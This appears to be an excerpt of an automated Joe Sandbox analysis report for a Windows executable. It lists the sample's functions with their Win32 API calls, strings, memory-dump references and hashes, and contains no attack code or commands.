                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$HandleModuleNameWrite
                                                                                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                • API String ID: 3784150691-4022980321
                                                                                                                • Opcode ID: e76ecb60561fe747eec25ea6da2aa861ca3e5a9d7f3461b9d4a94d885804126d
                                                                                                                • Instruction ID: dd0201cc8d4d8b0dfcb57b62c9b49e6d742448a59313f766a6a12cff913f25f6
                                                                                                                • Opcode Fuzzy Hash: e76ecb60561fe747eec25ea6da2aa861ca3e5a9d7f3461b9d4a94d885804126d
                                                                                                                • Instruction Fuzzy Hash: DA410AB2B0021076DA222A769D8AFFF756C9B11B54F15013FFD0591292FE6D8A8241FD
                                                                                                                Function 0045F2C5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 146windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
                                                                                                                • IsMenu.USER32(?), ref: 0045F380
                                                                                                                • CreatePopupMenu.USER32 ref: 0045F3C5
                                                                                                                • GetMenuItemCount.USER32(?), ref: 0045F42F
                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                • String ID: 0$2
                                                                                                                • API String ID: 93392585-3793063076
                                                                                                                • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                                • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                                                                                                • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                                • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                                                                                                Function 004507E7 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 146windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
                                                                                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
                                                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
                                                                                                                • SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window
                                                                                                                • String ID: -----$SysListView32
                                                                                                                • API String ID: 2326795674-3975388722
                                                                                                                • Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                                                                • Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
                                                                                                                • Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                                                                • Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
                                                                                                                Function 00436582 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 004365A5
                                                                                                                • gethostname.WSOCK32(00000100,00000100,00000101,?), ref: 004365BC
                                                                                                                • gethostbyname.WSOCK32(00000101,00000100,00000100,00000101,?), ref: 004365C6
                                                                                                                • WSACleanup.WSOCK32 ref: 004365FD
                                                                                                                • inet_ntoa.WSOCK32(00000100,?), ref: 00436624
                                                                                                                • WSACleanup.WSOCK32(?,?,?,?,?,?,00000100,?), ref: 00436652
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cleanup$Startupgethostbynamegethostnameinet_ntoa
                                                                                                                • String ID: 0.0.0.0
                                                                                                                • API String ID: 1500336939-3771769585
                                                                                                                • Opcode ID: 65646d0c3f70c30576c3209c49215e1e6413ca059fa52035c9da78ad10046a0d
                                                                                                                • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                                                                                                • Opcode Fuzzy Hash: 65646d0c3f70c30576c3209c49215e1e6413ca059fa52035c9da78ad10046a0d
                                                                                                                • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                                                                                                Function 00416B12 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 57libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                                                                                                • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
                                                                                                                • GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
                                                                                                                • InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
                                                                                                                  • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                                                                                                  • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc$IncrementInterlockedSleep
                                                                                                                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                • API String ID: 3998264955-2843748187
                                                                                                                • Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                                                • Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
                                                                                                                • Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                                                • Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
                                                                                                                Function 0043717F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\p4rsJEIb7k.exe), ref: 0043719E
                                                                                                                • LoadStringW.USER32(00000000), ref: 004371A7
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                                                                                                • LoadStringW.USER32(00000000), ref: 004371C0
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
                                                                                                                Strings
                                                                                                                • C:\Users\user\Desktop\p4rsJEIb7k.exe, xrefs: 00437189
                                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadModuleString$Message
                                                                                                                • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\p4rsJEIb7k.exe
                                                                                                                • API String ID: 4072794657-3785691661
                                                                                                                • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                                • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                                                                                                                • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                                • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                                                                                                                Function 00441561 Relevance: 12.1, APIs: 8, Instructions: 101windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(?), ref: 0044157D
                                                                                                                • GetDC.USER32(00000000), ref: 00441585
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3864802216-0
                                                                                                                • Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                                                • Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
                                                                                                                • Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                                                                • Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
                                                                                                                Function 0046ECBF Relevance: 12.1, APIs: 8, Instructions: 101COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1927566239-0
                                                                                                                • Opcode ID: afb533e23b19910be0c027df8fa87fd227b592e7e5a0e6e969ae1a59b8da4157
                                                                                                                • Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
                                                                                                                • Opcode Fuzzy Hash: afb533e23b19910be0c027df8fa87fd227b592e7e5a0e6e969ae1a59b8da4157
                                                                                                                • Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
                                                                                                                Function 00417C37 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 00417C51
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00417C5E
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00417C6B
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00417C78
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00417C85
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00417CA1
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00417CB1
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00417CC7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DecrementInterlocked
                                                                                                                • String ID:
                                                                                                                • API String ID: 3448037634-0
                                                                                                                • Opcode ID: e3e593b2512a4258f70d79ada8771ba765959c03c41681832578354204dfbbb8
                                                                                                                • Instruction ID: a6556518ad8db110cb1b00e702d9e0698ae62f30edd3f87937ee49336a9ec4f3
                                                                                                                • Opcode Fuzzy Hash: e3e593b2512a4258f70d79ada8771ba765959c03c41681832578354204dfbbb8
                                                                                                                • Instruction Fuzzy Hash: ED11FE71B04615A7DB109B69DD84B97B7ADAF40741F084417A808D7340EB78E9908BE8
                                                                                                                Function 004357AD Relevance: 12.0, APIs: 8, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VariantClear.OLEAUT32(00000038), ref: 004357C3
                                                                                                                • VariantClear.OLEAUT32(00000058), ref: 004357C9
                                                                                                                • VariantClear.OLEAUT32(00000068), ref: 004357CF
                                                                                                                • VariantClear.OLEAUT32(00000078), ref: 004357D5
                                                                                                                • VariantClear.OLEAUT32(00000088), ref: 004357DE
                                                                                                                • VariantClear.OLEAUT32(00000048), ref: 004357E4
                                                                                                                • VariantClear.OLEAUT32(00000098), ref: 004357ED
                                                                                                                • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1473721057-0
                                                                                                                • Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                                                • Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
                                                                                                                • Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                                                                • Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
                                                                                                                Function 00440B39 Relevance: 10.8, APIs: 7, Instructions: 261COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 00440B7B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 4116985748-0
                                                                                                                • Opcode ID: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                                • Instruction ID: 1e23dbab6d9439f1299be2c39bdf7de0481ead398f869a6d5eaf0ea33fa99bdf
                                                                                                                • Opcode Fuzzy Hash: eff4c90f3403bcfb76001cffaab33834930133fcb34fa8184a7caea4de8066d9
                                                                                                                • Instruction Fuzzy Hash: 8EA19C70608701DBE314CF68C984B6BBBE1FB88704F14491EFA8593251E778F965CB5A
                                                                                                                Function 0046AB70 Relevance: 10.8, APIs: 7, Instructions: 260registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AC62
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConnectRegistry
                                                                                                                • String ID:
                                                                                                                • API String ID: 76216097-0
                                                                                                                • Opcode ID: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                                • Instruction ID: 71109d01e6e71572d3d886d5d9f1e4ab699fb1be984f768d753da2f0a00da466
                                                                                                                • Opcode Fuzzy Hash: 37987dacba266e2f7d681c7555595b89ca1c624194ad33880a6965c3691367fb
                                                                                                                • Instruction Fuzzy Hash: BBA18EB1204300AFC710EF65C885B1BB7E4BF85704F14896EF685AB292D779E905CB9B
                                                                                                                Function 0047395A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentProcessId.KERNEL32(?), ref: 00473A00
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00473A0E
                                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00473A34
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000028), ref: 00473C01
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 3488606520-2761332787
                                                                                                                • Opcode ID: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                                • Instruction ID: 2161edc7e7eefe464b48455ffcea7dd3157e2cbe85e131cccd8837112284b0a3
                                                                                                                • Opcode Fuzzy Hash: 12402d889b8d2545f97f81e579d11a3e1d05628ef8a47b4e2ac7d1c45517ac81
                                                                                                                • Instruction Fuzzy Hash: 3581BF71A043019FD320EF69C882B5BF7E4AF84744F108C2EF598AB392D675E945CB96
                                                                                                                Function 004472C8 Relevance: 10.7, APIs: 7, Instructions: 207COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                                                                • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                                                                • LineTo.GDI32(?,?), ref: 004474BF
                                                                                                                • CloseFigure.GDI32(?), ref: 004474C6
                                                                                                                • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                                                                • Rectangle.GDI32(?,?), ref: 004474F3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                • String ID:
                                                                                                                • API String ID: 4082120231-0
                                                                                                                • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                                                                                • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                                                                • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
